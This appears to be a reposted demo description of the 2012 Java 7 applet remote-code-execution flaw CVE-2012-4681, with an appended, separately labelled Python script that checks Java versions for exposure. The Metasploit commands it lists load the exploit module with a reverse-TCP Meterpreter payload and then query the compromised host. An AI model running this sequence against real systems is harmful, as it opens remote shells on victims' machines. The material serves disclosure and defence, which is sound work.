Wubi

Java 7 Applet RCE 0day Gondvv Linux Metasploit Demo

Description:
Vulnerability found exploited in the wild and discovered by Michael Schierl
First details of the vulnerability on 2012-08-26
Source code of the vulnerability provided by jduck on 2012-08-26
Metasploit PoC provided on 2012-08-27

PoC provided by:
Unknown
jduck
sinn3r
juan vazquez

Reference(s) :
CVE-2012-4681
OSVDB-84867
BID-55213
Zero-Day Season is Not Over Yet
Java 7 0-Day vulnerability information and mitigation

Affected versions :
Oracle JSE (Java Standard Edition) version 1.7.0_06-b24 and previous.

Tested on Ubuntu 12.04 with :
Firefox & Oracle JSE 1.7.0_06-b24

Description :
This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary Java code outside the sandbox. This flaw is also being exploited in the wild, and there is no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome and Firefox across different platforms.

Metasploit demo :

use exploit/multi/browser/java_jre17_exec
set SRVHOST 192.168.178.100
set TARGET 2
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

Source: YouTube
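
Added example, not part of the original post: a defender-side inventory check that classifies `java -version` output against the affected range stated above (Oracle JSE 1.7.0_06-b24 and previous). The host names and sample outputs are constructed, and limiting the check to the 1.7.0 family is an assumption taken from the post's "vulnerability in Java 7" wording.

```python
import re

# Highest build the post lists as affected: 1.7.0_06-b24.
AFFECTED_FAMILY = (1, 7, 0)
MAX_UPDATE, MAX_BUILD = 6, 24

# Matches 1.7.0, 1.7.0_06 and 1.7.0_06-b24 style version strings.
VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)(?:_(\d+))?(?:-b(\d+))?")

# Constructed sample outputs of `java -version`, keyed by hypothetical host name.
SAMPLES = {
    "ws-01": 'java version "1.7.0_06"\n'
             "Java(TM) SE Runtime Environment (build 1.7.0_06-b24)",
    "ws-02": 'java version "1.7.0_07"',
    "ws-03": 'java version "1.6.0_35"',
    "ws-04": "bash: java: command not found",
}


def parse_java_version(text):
    """Return ((major, minor, patch), update, build), or None if no version is found."""
    best = None
    for m in VERSION_RE.finditer(text):
        family = tuple(int(m.group(i)) for i in (1, 2, 3))
        update = int(m.group(4)) if m.group(4) else 0
        build = int(m.group(5)) if m.group(5) else None
        # Prefer the match that carries a build number (Runtime Environment line).
        if best is None or (best[2] is None and build is not None):
            best = (family, update, build)
    return best


def classify(text):
    """Return 'affected', 'not-listed' or 'unparsed' for one version output."""
    parsed = parse_java_version(text)
    if parsed is None:
        return "unparsed"
    family, update, build = parsed
    if family != AFFECTED_FAMILY:
        return "not-listed"
    if update < MAX_UPDATE:
        return "affected"
    # Same update as the listed build: a missing build number is treated as affected.
    at_limit = update == MAX_UPDATE and (build is None or build <= MAX_BUILD)
    return "affected" if at_limit else "not-listed"


if __name__ == "__main__":
    for host, output in SAMPLES.items():
        print(host, classify(output))
```

"not-listed" only means the version falls outside the range this post gives; it says nothing about other advisories.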
